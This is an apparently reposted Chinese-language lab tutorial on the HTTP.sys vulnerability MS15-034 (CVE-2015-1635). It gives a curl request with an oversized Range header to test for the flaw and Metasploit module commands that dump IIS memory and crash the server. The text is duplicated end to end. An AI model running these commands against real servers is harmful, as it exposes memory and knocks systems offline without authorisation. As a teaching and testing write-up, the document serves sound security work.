CVE-2015-1635-HTTP.SYS遠端執行程式碼漏洞(ms15-034)
1.1.1 漏洞描述
在2015年4月安全補丁日,微軟釋出的眾多安全更新中,修復了HTTP.sys中一處允許遠端執行程式碼漏洞,編號為:CVE-2015-1635(MS15-034 )。利用HTTP.sys的安全漏洞,攻擊者只需要傳送惡意的http請求資料包,就可能遠端讀取IIS伺服器的記憶體資料,或使伺服器系統藍屏崩潰。根據公告顯示,該漏洞對伺服器系統造成了不小的影響,主要影響了包括Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2在內的主流伺服器作業系統。
1.1.2 漏洞測試
環境搭建:
伺服器器: win7或者Server 2012 r2(192.168.80.130)
(1)使用curl工具(需要安裝)進行測試,測試命令:
curl http://192.168.80.130 -H "Host: 192.168.80.130" -H "Range: bytes=0-18446744073709551615"
測試結果截圖:
若IIS伺服器返回“Requested Range Not Satisfiable”,則是存在漏洞,否則如果返回”The request has an invalid header name“,則說明漏洞已經修補。
1.1.3 漏洞利用
(1)利用ms15-034漏洞讀取伺服器記憶體資料
藉助metasploit平臺,截圖如下:
use auxiliary/scanner/http/ms15_034_http_sys_memory_dump
set rhosts 192.168.80.130
run
(2)利用ms15-034漏洞進行ddos攻擊
同樣藉助metasploit平臺,截圖如下:
use auxiliary/dos/http/ms15_034_ulonglongadd
set rhosts 192.168.80.130
set threads 10
run
攻擊開始後,win7瞬間藍屏然後自動重啟,截圖如下:
1.1.4 漏洞修復
禁用IIS核心快取(可能降低IIS效能)
轉載:https://www.cnblogs.com/itcui/p/15544659.html
https://www.cnblogs.com/peterpan0707007/p/8529261.html
Curl
https://www.ruanyifeng.com/blog/2019/09/curl-reference.html 360安全官網解釋: https://blogs.360.cn/post/cve_2015_6135_http_rce_analysis.html1.1.1 漏洞描述
在2015年4月安全補丁日,微軟釋出的眾多安全更新中,修復了HTTP.sys中一處允許遠端執行程式碼漏洞,編號為:CVE-2015-1635(MS15-034 )。利用HTTP.sys的安全漏洞,攻擊者只需要傳送惡意的http請求資料包,就可能遠端讀取IIS伺服器的記憶體資料,或使伺服器系統藍屏崩潰。根據公告顯示,該漏洞對伺服器系統造成了不小的影響,主要影響了包括Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2在內的主流伺服器作業系統。
1.1.2 漏洞測試
環境搭建:
伺服器器: win7或者Server 2012 r2(192.168.80.130)
(1)使用curl工具(需要安裝)進行測試,測試命令:
curl http://192.168.80.130 -H "Host: 192.168.80.130" -H "Range: bytes=0-18446744073709551615"
測試結果截圖:
若IIS伺服器返回“Requested Range Not Satisfiable”,則是存在漏洞,否則如果返回”The request has an invalid header name“,則說明漏洞已經修補。
1.1.3 漏洞利用
(1)利用ms15-034漏洞讀取伺服器記憶體資料
藉助metasploit平臺,截圖如下:
use auxiliary/scanner/http/ms15_034_http_sys_memory_dump
set rhosts 192.168.80.130
run
(2)利用ms15-034漏洞進行ddos攻擊
同樣藉助metasploit平臺,截圖如下:
use auxiliary/dos/http/ms15_034_ulonglongadd
set rhosts 192.168.80.130
set threads 10
run
攻擊開始後,win7瞬間藍屏然後自動重啟,截圖如下:
1.1.4 漏洞修復
禁用IIS核心快取(可能降低IIS效能)
轉載:https://www.cnblogs.com/itcui/p/15544659.html
https://www.cnblogs.com/peterpan0707007/p/8529261.html
Curl
https://www.ruanyifeng.com/blog/2019/09/curl-reference.html 360安全官網解釋: https://blogs.360.cn/post/cve_2015_6135_http_rce_analysis.html